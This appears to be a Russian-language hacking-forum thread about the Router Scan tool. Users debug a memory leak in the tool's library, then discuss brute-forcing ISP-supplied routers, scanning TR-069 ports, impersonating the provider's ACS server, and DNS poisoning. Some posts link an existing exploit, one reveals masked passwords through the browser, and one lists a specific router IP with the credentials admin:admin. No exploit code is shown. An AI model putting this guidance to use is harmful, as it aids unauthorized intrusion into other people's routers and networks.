Только обновил librouter.dll. А что скидывать? ошибок нет, утечек нет. Лог создается при ошибке. Когда выключаю функцию ScanRouter, т.е. идет PrepareRouter и FreeRouter, утечки нет. Когда включена, только ip новый даю, даже из SetTableDataW результаты не забираю, где то за час, при 1000 потоков, от 70 мегабайт, до 600 и out of memory.
В ОЗУ не остается, оставалось потому что вырубал не остановив потоки, т.е. просто память программы увеличивается до out of memory. Все как из примера, только в цикле и многопоточно.
85.113.137.82 80 15 Done Boa/0.94.14rc21 (Wireless Mini Router)
admin:admin
неспарсилось
Felis-Sapiens
15.03.2018, 20:34
А что скидывать?
https://s8.hostingkartinok.com/uploads/thumbs/2018/03/ec882678a4489abc4ffc56d063df4c6a.png
И в идеале, посмотреть бы на код.
И в идеале, посмотреть бы на код.
Набросал простой пример, указываем потоки, запускаем и смотрим как увеличивается память программы.
https://uploadgig.com/file/download/8086fd9b2a60A923/routerscan example.zip
pass: antichat
Piligrim740
16.03.2018, 07:59
Интересует такой вопрос - будет-ли обгрэйд программы с роутерами Sagemcom и ZTE 218 ?
DOM.RU в моём регионе очень много ставят таких роутеров , отсюда интерес.
Брутить такие роутеры дело хлопатное , ну вы в курсе.
Версия 2.60 Router Scan эти роутеры тупо не видит.
Переодически прогоняю ip домрушные , Sagemcom ни разу не показал.
Интересует такой вопрос - будет-ли обгрэйд программы с роутерами Sagemcom и ZTE 218 ?
DOM.RU в моём регионе очень много ставят таких роутеров , отсюда интерес.
Брутить такие роутеры дело хлопатное , ну вы в курсе.
Версия 2.60 Router Scan эти роутеры тупо не видит.
Переодически прогоняю ip домрушные , Sagemcom ни разу не показал.
DOMRU(по моим наблюдениям) все современные прошивки "коробочных" роутеров угнал на TR069.
Ищите на соответствующих портах: 1050,6363,7547,58000, итд.
Вот только это бесполезно, если вы не сможете подделать путь запроса(сессию) со стороны WAN, и убедить устройство что вы провайдерское оборудование и находитесь по нужному адресу.
Ищите на соответствующих портах: 1050,6363,7547,58000, итд.
Вот только это бесполезно, если вы не сможете подделать путь запроса(сессию) со стороны WAN, и убедить устройство что вы провайдерское оборудование и находитесь по нужному адресу
Прогнал RS по указанным портам, действительно много кто откликается, но % успеха очень мал
Вот бы найти эксплоиты, да в программу их...
binarymaster
16.03.2018, 13:54
будет-ли обгрэйд программы с роутерами Sagemcom и ZTE 218 ?
Версия 2.60 Router Scan эти роутеры тупо не видит.
Как только кто-нибудь найдёт вход в их админку, и скинет IP для добавления (заранее проверив, что с этого IP доступна админка со всеми настройками).
Вот бы найти эксплоиты, да в программу их...
TR-069 - это жесть. Тут без инсайдеров не обойдёшься.
Прогнал RS по указанным портам, действительно много кто откликается, но % успеха очень мал
Вот бы найти эксплоиты, да в программу их...
Я могу снова в domru-шных поковырятся прошивках, пары для TR069 абонентских устройств не великий секрет, но ещё раз повторю, толку от этого 0.
Если вы не сможете откликнутся/находится по адресу провайдерского оборудования, а это можно сделать только уломав хопы/свичи от конечного устройства абонента(со стороны WAN), до управляющего оборудования провайдера. Я могу представить что это можно сделать отравив DNS, но на такой разбой у нас не принято ходить(я надеюсь).
Среди результатов нашел роутер, который одновременно откликнулся на обычный порт и на 7547. Зашел на него, в настройках TR-069 указан url ACS сервера, логин, пароль за звездочками на сервер, так же логин и пароль на Connection Request (интересно, это входящее соединение на роутер?) и еще какие-то настройки.
Допустим, выгрузив конфиг с роутера, можно расшифровать оба пароля. Если даже получится расшифровать второй пароль, который на Connection Request, то очевидно что на 7547 не будет веб-интерфейса и туда нужно пихать некий эксплоит.
В общем, тут моих скромных познаний явно не хватает. Не поделитесь ресурсами для изучения?
Вот тут коротенько: https://ru.wikipedia.org/wiki/TR-069
Felis-Sapiens
16.03.2018, 14:57
Не поделитесь ресурсами для изучения?
https://www.broadband-forum.org/technical/download/TR-069_Amendment-5.pdf
Действительно на порту 1050 ОЧЕНЬ много роутеров висит. Определяются как dirname.
В посте https://forum.antichat.ru/threads/398971/page-33#post-3861078 указаны пароли. При попытке зайти по ip отрывается страница авторизации. вводишь логин пароль вылазит пустая страница то-есть авторизация проходит. Осталось только действительно убедить роутеры что ты пров.
Наверное это в принципе возможно. Кто-то этим ведь пользуется.
"Если хакер скомпрометирует ACS-сервер, он сможет получить информацию с подконтрольных серверу маршрутизаторов, в том числе имена и пароли беспроводных сетей, MAC-адреса аппаратного обеспечения, данные учетных записей VoIP, логины и пароли администраторских учетных записей... Подробнее: https://www.securitylab.ru/news/456326.php"
https://xakep.ru/2016/11/25/eir-d1000-flaw/ есть описание эксплоита протокола TR-069 для ZyXEL Eir D1000 сам эксплоит https://github.com/XiphosResearch/exploits/blob/master/tr-06fail/tr-06fail-ssh-d1000.py возможно его можно адаптировать для других устройств.
Если у кого есть возможность побробывать. http://www.f1cd.ru/press_release/488 ACS сервер от D-Link
http://ciscoacs.blogspot.ru/2014/08/acs-5.html ACS сервер от Cisco Они под Linux устанавливаются и моих знаний не хватит.
"Под звездочками" Щелкнуть на этом поле правой кнопкой и выбрать исследовать элемент. Потом вместо типа password написать text и если поле не пустое видно будет пароль. Ради такого случая могу переключиться на dom/ всеравно хотел проверить что у них там изменилось. Вот только не гарантии что дадут такое оборудование.... Думаю что с 069 все актуальнее становится...... Печалька короче..........
Набросал простой пример, указываем потоки, запускаем и смотрим как увеличивается память программы.
https://uploadgig.com/file/download/8086fd9b2a60A923/routerscan example.zip
pass: antichat
Что нибудь выяснилось?
Felis-Sapiens
17.03.2018, 00:19
Что нибудь выяснилось?
Особо пока не смотрел. Видел только, что вы напрямую обращаетесь к GUI из потоков, чего делать не стоит.
P.S. И, пожалуйста, не заливайте на этот файлообменник.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot